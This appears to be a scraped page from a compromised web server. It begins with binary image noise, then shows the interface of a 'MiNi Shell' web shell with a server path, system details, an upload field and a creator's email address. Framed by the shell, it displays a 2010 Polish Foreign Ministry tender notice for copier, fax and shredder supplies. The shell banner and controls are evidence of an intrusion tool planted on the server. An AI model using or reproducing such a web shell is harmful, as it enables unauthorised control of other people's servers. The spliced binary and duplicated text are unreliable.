JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100708/200678-N-2010.html

<p class="kh_header"><b>Warszawa: POSTĘPOWANIE O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO PROWADZONEGO W TRYBIEPRZETARGU NIEOGRANICZONEGO DO 125 000 EURO NA ZAKUP WRAZ Z DOSTAWĄ MATERIAŁÓW EKSPLOATACYJNYCH DO KSEROKOPIAREK, FAKSÓW, NISZCZAREK</b><br>
<b>Numer ogłoszenia: 200678 - 2010; data zamieszczenia: 08.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> POSTĘPOWANIE O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO PROWADZONEGO W TRYBIEPRZETARGU NIEOGRANICZONEGO DO 125 000 EURO NA ZAKUP WRAZ Z DOSTAWĄ MATERIAŁÓW EKSPLOATACYJNYCH DO KSEROKOPIAREK, FAKSÓW, NISZCZAREK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OZNACZENIE POSTĘPOWANIA: ZO/7530/20A/2010
Przedmiotem zamówienia jest: 
Zakup wraz z dostawą  materiałów eksploatacyjnych do kserokopiarek, faksów, niszczarek .

Kod CPV - 30124300-7 bębny do maszyn biurowych    
	  30125110-5 toner do drukarek laserowych, faksów
	  30125120-8 toner do fotokopiarek
	  30125000-1 części i akcesoria do aparatów fotokopiujących		 		

1.Przedmiotem zamówienia będzie dostawa do siedziby Zamawiającego oryginalnych 
(fabrycznie nowych) materiałów eksploatacyjnych do kserokopiarek, faksów, niszczarek, znajdujących się we wszystkich obiektach Ministerstwa Spraw Zagranicznych, wyszczególnionych poniżej.
2.Ze względu na możliwość likwidacji starych lub zakupu nowych urządzeń asortyment może ulec zmianie w ramach obowiązującej umowy, nie przekraczając jej wartości.
3.Realizacja dostawy zamówienia odbywać się będzie sukcesywnie, w miarę potrzeb Zamawiającego.
4.Termin dostawy zamówienia do siedziby Zamawiającego wynosi nie dłużej niż 2 dni od daty złożenia zamówienia. 
5.Miejscem dostawy przedmiotu zamówienia będzie Magazyn Główny MSZ przy 
ul. Tanecznej 73 w Warszawie.
6.Wykonawca, w trakcie realizacji dostaw objętych przedmiotem umowy zobowiązany będzie do zbierania zużytych cardrige, opakowań po tonerach itp.
7.Podane ilości materiałów eksploatacyjnych dotyczą 1 sztuki, a nie ilości opakowań fabrycznych zawierających dwie lub więcej sztuk.


OZNACZENIE POSTĘPOWANIA: ZO/7530/20A/2010
Przedmiotem zamówienia jest: 
Zakup wraz z dostawą  materiałów eksploatacyjnych do kserokopiarek, faksów, niszczarek .

Kod CPV - 30124300-7 bębny do maszyn biurowych    
	         30125110-5 toner do drukarek laserowych, faksów
	         30125120-8 toner do fotokopiarek
	         30125000-1 części i akcesoria do aparatów fotokopiujących		 		

1.	Przedmiotem zamówienia będzie dostawa do siedziby Zamawiającego oryginalnych 
(fabrycznie nowych) materiałów eksploatacyjnych do kserokopiarek, faksów, niszczarek, znajdujących się we wszystkich obiektach Ministerstwa Spraw Zagranicznych, wyszczególnionych poniżej.
2.	Ze względu na możliwość likwidacji starych lub zakupu nowych urządzeń asortyment może ulec zmianie w ramach obowiązującej umowy, nie przekraczając jej wartości.
3.	Realizacja dostawy zamówienia odbywać się będzie sukcesywnie, w miarę potrzeb Zamawiającego.
4.	Termin dostawy zamówienia do siedziby Zamawiającego wynosi nie dłużej niż 2 dni od daty złożenia zamówienia. 
5.	Miejscem dostawy przedmiotu zamówienia będzie Magazyn Główny MSZ przy 
ul. Tanecznej 73 w Warszawie.
6.	Wykonawca, w trakcie realizacji dostaw objętych przedmiotem umowy zobowiązany będzie do zbierania zużytych cardrige, opakowań po tonerach itp.
7.	Podane ilości materiałów eksploatacyjnych dotyczą 1 sztuki, a nie ilości opakowań fabrycznych zawierających dwie lub więcej sztuk.

Materiały eksploatacyjne do faksów:
l.p.	Oznaczenie faksu	Materiał	Ilość w szt.
1.Minolta MF-1600	Toner	             30
2.Mita TC-710	Toner	              4
3.Mita Vi-30	Cardrige	             30
4.Mita TC-710	Zespół bębna	2
5.Minolta MF-1600	Zespół bębna	20
6.Konika 7013	Toner	             30
7.Konika 7013	Zespół bębna	25
8.Konika 7013	Zespół utrwalania	8
9.Konika 130F	Zespół bębna	30
10.Konika 130F	Toner	            40
11.Konika 130F	Zespół utrwalania	8
12.Bizhub C-20	Zestaw 3 tonerów kolorowych - 1 kpl	30
13.Bizhub C-20	Toner czarny	50
14.Bizhub C-20	Zestaw bębnów czarny + kolor	10
15.Panasonic UF-490	Toner	30
16.Panasonic UF-490	Bęben	15
17.Panasonic UF-590	Toner cardrige	10
18.Toshiba DP-80F	Toner	            16
19.Toshiba DP-80F	Bęben	              8
20.Toshiba TF-471	Ribbon cardrige	10
21.Toshiba TF-610	Toner	              4


Materiały eksploatacyjne do kserokopiarek:
l.p.	Oznaczenie kserokopiarki	Materiał	Ilość w szt.
2 Mita DC 1460	Toner	12
24Mita DC 2360	Toner	60
25Mita DC 4060	Toner	8
26Minolta Di 250	Toner	20
27Minolta Di 250	Zespół bębna	6
28Minolta Di 2510	Toner	50
29Minolta Di 3510	Toner	5
30Minolta Dialta Di 7210	Toner	14
31Minolta Dialta Di 7210	Zszywki MS 10A (MS10A)	15
32Minolta 1611	Toner	20
33Minolta Bizhub C-250 set kolor	Toner czarny	25
34Minolta Bizhub C-250 set kolor	Toner y-yelow	18
35Minolta Bizhub C-250 set kolor	Toner M-magente	18
36Minolta Bizhub C-250 set kolor	Toner C-cyon	18
37Minolta Bizhub C-250	Pojemnik na zużyty toner	5
38Minolta Bizhub C-250	Zespół transferowy	8
39Bizhub C-253	Toner czarny	70
40Bizhub C-253	Zestaw 3 tonerów kolorowych - 1 kpl.	30
41Bizhub C-253	Zestaw bębnów czarny + kolor	20
42Bizhub C-253	Pojemnik na zużyty toner	5
43Minolta Bizhub 750	Toner	40
44Minolta Bizhub 750	Zszywki 14YK	10
45Minolta magicolor 2490MF	Toner czarny	10
46Minolta magicolor 2490MF zestaw 3 tonerów kolor	Toner	5
47Minolta magicolor 2490MF	Zespół bębna	4
48Minolta magicolor 2490MF	Zespół transferowy	4
49Minolta Bizhub 920	Toner	20
50Bizhub C-300	Toner czarny	10
51Bizhub C-300	Zestaw 3 tonerów kolor	3
52Bizhub C-300	Zestaw bębnów czarny + kolor	3
53Minolta 5510	Toner czarny	10
54Canon IR 6800CN	Toner czarny	5
55Canon IR 6800CN	Zestaw 3 tonerów kolor	2
56Canon IR 6800CN	Zestaw bębnów czarny + kolor	1
57Xerox DC-230	Toner czarny	3
58Xerox Work Centre 7335	Toner czarny	10
59Xerox Work Centre 7335	Zestaw 3 tonerów kolor	4
60Xerox Work Centre 7335	Zestaw bębnów czarny + kolor	3
61Xerox Fazer 330MF	Cardrige	10
62HP mod. LJM 5035	Cardrige	10
63HP mod. 1522NF	Cardrige	10
64Toshiba mod. 1360	Cardrige	10
65Toshiba mod. 2540	Toner	4
66Toshiba mod. 3580	Toner	4
67Olivetti d-Copia 2500MF	Toner	10

Materiały eksploatacyjne do niszczarek:
l.p.Oznaczenie niszczarki	Materiał	Ilość w szt.
69Ideal Typ 2400 cros cat	Koła zębate - 1 kpl	20
70Intimus Typ Simplex SE	Koła zębate - 1 kpl	20.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.43.00-7, 30.12.51.10-5, 30.12.51.20-8, 30.12.50.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 13 000,00 zł (słownie:  trzynaście tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku. Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postę, na podstawie załączonych do oferty dokumentów i oświadczen wymaganych w pkt. 6.1 i 6.2 SIWZ przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia moga ubiegać się Wykonawcy którzy: wykażą się odpowiednim doświadczeniem w zakresie niezbędnym do wykazania spełniania powyższego warunku, tj.  w okresie ostatnich  trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie zrealizowali, a w przypadku świadczeń okresowych lub ciągłych, również realizują, co najmniej 2 dostawy polegające na dostawie materiałów eksploatacyjnych (np. tonery, cardrige) do  kserokopiarek, faksów, niszczarek lub urządzeń wielofunkcyjnych o  wartości co najmniej 500 000,00 zł brutto każda.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postę, na podstawie załączonych do oferty dokumentów i oświadczen wymaganych w pkt. 6.1 i 6.2 SIWZ przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku. Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postę, na podstawie załączonych do oferty dokumentów i oświadczen wymaganych w pkt. 6.1 i 6.2 SIWZ przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku. Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postę, na podstawie załączonych do oferty dokumentów i oświadczen wymaganych w pkt. 6.1 i 6.2 SIWZ przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku. Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postę, na podstawie załączonych do oferty dokumentów i oświadczen wymaganych w pkt. 6.1 i 6.2 SIWZ przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl zakładka aktualności- zamówienia publiczne zarząd obsługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi MSZ
Al. Szucha 23
 00-580 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2010 godzina 11:00, miejsce: Dziennik Podawczy MSZ
Al. Szucha 23
 00-580 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com